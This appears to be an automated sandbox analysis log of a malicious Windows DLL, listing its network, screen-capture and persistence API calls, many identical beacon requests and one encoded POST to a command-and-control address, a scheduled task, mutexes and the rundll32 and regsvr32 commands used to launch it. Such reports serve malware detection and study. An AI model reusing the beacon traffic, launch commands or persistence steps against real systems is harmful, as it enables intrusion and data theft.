Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE11501F20 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetSetOptionW,InternetSetOptionW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,wcscpy,wcscat,SetLastError,HttpSendRequestW,GetLastError,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,8_2_00007FFE11501F20
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: unknownHTTP traffic detected: POST / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Content-Length: 120Connection: Keep-AliveCache-Control: no-cacheData Raw: e4 31 93 8b 9c d0 f6 03 3e bb ef 52 64 c1 a6 e0 7b 26 73 32 9b 6e b3 1b ca a1 a7 e7 8f f5 36 22 5c fb 00 56 f2 3e 8d e0 c3 17 d9 5f dd d0 cb b4 1d a7 cc 3f b9 11 97 de 94 d1 ff 36 27 f0 9c 8f 9c 10 ec 74 6a a4 13 e9 c8 ec c6 61 56 e6 b7 2d b2 fe f8 7b 4b cc 17 0e bf 72 29 50 98 a5 bd 77 17 f3 25 e2 91 1f a5 c7 67 c5 ed fe 1f f0 bb 15 eb 2a be 50 73 b1 6c 66 Data Ascii: 1>Rd{&s2n6"\V>_?6'tjaV-{Kr)Pw%g*Pslf
Source: rundll32.exe, 00000008.00000002.3508798808.00000240CE85B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.5.43.29
Source: rundll32.exe, 00000008.00000002.3508798808.00000240CE85B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3508798808.00000240CE898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.5.43.29/
Source: rundll32.exe, 00000008.00000002.3508798808.00000240CE85B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.5.43.29/#tT
Source: rundll32.exe, 00000008.00000002.3508798808.00000240CE898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.5.43.29/$
Source: rundll32.exe, 00000008.00000002.3508798808.00000240CE898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.5.43.29/2
Source: rundll32.exe, 00000008.00000002.3508798808.00000240CE898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.5.43.29/5.43.29/ttingsE
Source: rundll32.exe, 00000008.00000002.3508798808.00000240CE85B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.5.43.29/Gt8
Source: rundll32.exe, 00000008.00000002.3508798808.00000240CE85B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.5.43.29/Rt#
Source: rundll32.exe, 00000008.00000002.3508798808.00000240CE85B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.5.43.29/pt
Source: rundll32.exe, 00000008.00000002.3508798808.00000240CE898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.5.43.29/ttings
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE115070A0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetDC,CreateCompatibleDC,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,BitBlt,DeleteObject,DeleteObject,ReleaseDC,8_2_00007FFE115070A0
Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\Tasks\Ventuso LLC.jobJump to behavior
Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\OAPIRH2O.htmJump to behavior
Source: C:\Windows\System32\rundll32.exeFile deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\OAPIRH2O.htmJump to behavior
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE1150C0EC8_2_00007FFE1150C0EC
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE1150DF948_2_00007FFE1150DF94
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE115027408_2_00007FFE11502740
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE11513B408_2_00007FFE11513B40
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE11507F608_2_00007FFE11507F60
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE115180388_2_00007FFE11518038
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE115114048_2_00007FFE11511404
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE115136708_2_00007FFE11513670
Source: classification engineClassification label: mal76.evad.winDLL@15/4@0/1
Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\7d0cec31-c3bc-4593-ad4a-8c140904383e
Source: C:\Windows\System32\rundll32.exeMutant created: \BaseNamedObjects\7d0cec31-c3bc-4593-ad4a-8c140904383e
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\461592c6-32a2-4a5a-9542-783ba1348002
Source: akdn2nefd.bin.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\akdn2nefd.bin.dll",#1
Source: akdn2nefd.bin.dllReversingLabs: Detection: 13%
Source: akdn2nefd.bin.dllVirustotal: Detection: 12%
Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\akdn2nefd.bin.dll"
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\akdn2nefd.bin.dll",#1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\akdn2nefd.bin.dll
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\akdn2nefd.bin.dll",#1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\akdn2nefd.bin.dll,DllGetClassObject
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\akdn2nefd.bin.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\akdn2nefd.bin.dll,DllRegisterServerEx
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe "C:\ProgramData\Ventuso LLC\Updater.dll",Start /u
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\akdn2nefd.bin.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\akdn2nefd.bin.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\akdn2nefd.bin.dll,DllGetClassObjectJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\akdn2nefd.bin.dll,DllRegisterServerJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\akdn2nefd.bin.dll,DllRegisterServerExJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\akdn2nefd.bin.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
Source: akdn2nefd.bin.dllStatic PE information: Image base 0x180000000 > 0x60000000
Source: akdn2nefd.bin.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: akdn2nefd.bin.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
